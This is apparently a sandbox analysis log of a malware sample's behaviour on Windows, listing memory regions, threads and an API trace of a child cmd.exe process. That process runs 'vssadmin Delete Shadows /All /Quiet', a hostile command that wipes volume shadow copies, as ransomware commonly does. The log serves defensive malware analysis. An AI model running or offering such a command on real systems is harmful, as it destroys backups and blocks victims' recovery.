	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1138
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1155
	        start_va = 0x232198c0000
	          end_va = 0x232198c6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000232198c0000"
	        filename = ""

Region:
	              id = 1156
	        start_va = 0x232198d0000
	          end_va = 0x232198d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000232198d0000"
	        filename = ""

Region:
	              id = 1157
	        start_va = 0x232198e0000
	          end_va = 0x232198e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000232198e0000"
	        filename = ""

Region:
	              id = 1158
	        start_va = 0x232198f0000
	          end_va = 0x232198f4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 1159
	        start_va = 0x23219900000
	          end_va = 0x23219900fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1171
	        start_va = 0x23219910000
	          end_va = 0x23219911fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219910000"
	        filename = ""

Region:
	              id = 1172
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1173
	        start_va = 0x23219920000
	          end_va = 0x23219920fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 1174
	        start_va = 0x23219930000
	          end_va = 0x23219931fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000023219930000"
	        filename = ""


Thread:
	id = 26
	os_tid = 0xe08


Thread:
	id = 31
	os_tid = 0x11bc


Thread:
	id = 36
	os_tid = 0xe54


Thread:
	id = 52
	os_tid = 0xf08


Process:
	id = "10"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x33c9d000"
	os_pid = "0xe18"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=X: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 680
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 681
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 682
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 683
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 684
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 685
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 686
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 687
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 688
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 689
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 690
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 691
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 692
	        start_va = 0x7e760000
	          end_va = 0x7e782fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e760000"
	        filename = ""

Region:
	              id = 693
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 694
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 695
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 696
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 697
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 725
	        start_va = 0x1c0000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 726
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 727
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 748
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 749
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 750
	        start_va = 0x4600000
	          end_va = 0x472ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 775
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 776
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 777
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 778
	        start_va = 0x7e660000
	          end_va = 0x7e75ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e660000"
	        filename = ""

Region:
	              id = 1275
	        start_va = 0x4730000
	          end_va = 0x47edfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1276
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1277
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1278
	        start_va = 0x260000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000260000"
	        filename = ""

Region:
	              id = 1279
	        start_va = 0x47f0000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047f0000"
	        filename = ""

Region:
	              id = 1280
	        start_va = 0x4350000
	          end_va = 0x43fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1293
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1294
	        start_va = 0x43f0000
	          end_va = 0x43fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000043f0000"
	        filename = ""

Region:
	              id = 1531
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 1614
	        start_va = 0x48f0000
	          end_va = 0x4c26fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 28
	os_tid = 0x1228

	[0237.392] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0237.393] GetProcessHeap () returned 0x4630000
	[0237.393] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x400a) returned 0x463b998
	[0237.393] GetProcessHeap () returned 0x4630000
	[0237.394] RtlFreeHeap (HeapHandle=0x4630000, Flags=0x0, BaseAddress=0x463b998) returned 1
	[0237.395] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0237.396] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0237.396] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0237.396] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0237.396] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0237.396] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0237.396] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0237.396] GetProcessHeap () returned 0x4630000
	[0237.396] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x58) returned 0x4639048
	[0237.396] GetProcessHeap () returned 0x4630000
	[0237.396] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x1a) returned 0x4637318
	[0237.399] GetProcessHeap () returned 0x4630000
	[0237.399] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x52) returned 0x46390a8
	[0237.401] GetConsoleTitleW (in: lpConsoleTitle=0x18f550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0237.764] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0237.765] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0237.766] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0237.767] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0237.768] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0237.768] GetProcessHeap () returned 0x4630000
	[0237.768] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x210) returned 0x4639108
	[0237.769] GetProcessHeap () returned 0x4630000
	[0237.769] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x64) returned 0x4639320
	[0237.769] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0237.769] GetProcessHeap () returned 0x4630000
	[0237.769] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x418) returned 0x46305c8
	[0237.770] SetErrorMode (uMode=0x0) returned 0x0
	[0237.770] SetErrorMode (uMode=0x1) returned 0x0
	[0237.770] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46305d0, lpFilePart=0x18f05c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f05c*="Desktop") returned 0x1d
	[0237.770] SetErrorMode (uMode=0x0) returned 0x1
	[0237.770] GetProcessHeap () returned 0x4630000
	[0237.770] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x46305c8, Size=0x56) returned 0x46305c8
	[0237.770] GetProcessHeap () returned 0x4630000
	[0237.770] RtlSizeHeap (HeapHandle=0x4630000, Flags=0x0, MemoryPointer=0x46305c8) returned 0x56
	[0237.770] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0237.771] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0237.771] GetProcessHeap () returned 0x4630000
	[0237.771] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x182) returned 0x4639390
	[0237.771] GetProcessHeap () returned 0x4630000
	[0237.771] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x2fc) returned 0x4630628
	[0237.785] GetProcessHeap () returned 0x4630000
	[0237.785] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x4630628, Size=0x184) returned 0x4630628
	[0237.785] GetProcessHeap () returned 0x4630000
	[0237.785] RtlSizeHeap (HeapHandle=0x4630000, Flags=0x0, MemoryPointer=0x4630628) returned 0x184
	[0237.785] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0237.786] GetProcessHeap () returned 0x4630000
	[0237.786] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0xe0) returned 0x4639520
	[0237.790] GetProcessHeap () returned 0x4630000
	[0237.790] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x4639520, Size=0x76) returned 0x4639520
	[0237.790] GetProcessHeap () returned 0x4630000
	[0237.790] RtlSizeHeap (HeapHandle=0x4630000, Flags=0x0, MemoryPointer=0x4639520) returned 0x76
	[0237.791] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0237.791] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede8) returned 0xffffffff
	[0237.792] GetLastError () returned 0x2
	[0237.792] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0237.792] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede8) returned 0xffffffff
	[0237.792] GetLastError () returned 0x2
	[0237.792] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0237.792] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede8) returned 0x46395a0
	[0237.792] GetProcessHeap () returned 0x4630000
	[0237.792] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x0, Size=0x14) returned 0x4637b10
	[0237.792] FindClose (in: hFindFile=0x46395a0 | out: hFindFile=0x46395a0) returned 1
	[0237.792] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede8) returned 0xffffffff
	[0237.793] GetLastError () returned 0x2
	[0237.793] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ede8) returned 0x46395a0
	[0237.793] GetProcessHeap () returned 0x4630000
	[0237.793] RtlReAllocateHeap (Heap=0x4630000, Flags=0x0, Ptr=0x4637b10, Size=0x4) returned 0x4637520
	[0237.793] FindClose (in: hFindFile=0x46395a0 | out: hFindFile=0x46395a0) returned 1
	[0237.793] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0237.793] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0237.793] GetConsoleTitleW (in: lpConsoleTitle=0x18f2dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0238.264] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f208, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f1ec | out: lpAttributeList=0x18f208, lpSize=0x18f1ec) returned 1
	[0238.264] UpdateProcThreadAttribute (in: lpAttributeList=0x18f208, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f1f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f208, lpPreviousValue=0x0) returned 1
	[0238.264] GetStartupInfoW (in: lpStartupInfo=0x18f240 | out: lpStartupInfo=0x18f240*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0238.265] GetProcessHeap () returned 0x4630000
	[0238.265] RtlAllocateHeap (HeapHandle=0x4630000, Flags=0x8, Size=0x18) returned 0x4637b30
	[0238.265] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0238.265] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0238.265] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0238.265] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0238.265] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0238.266] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
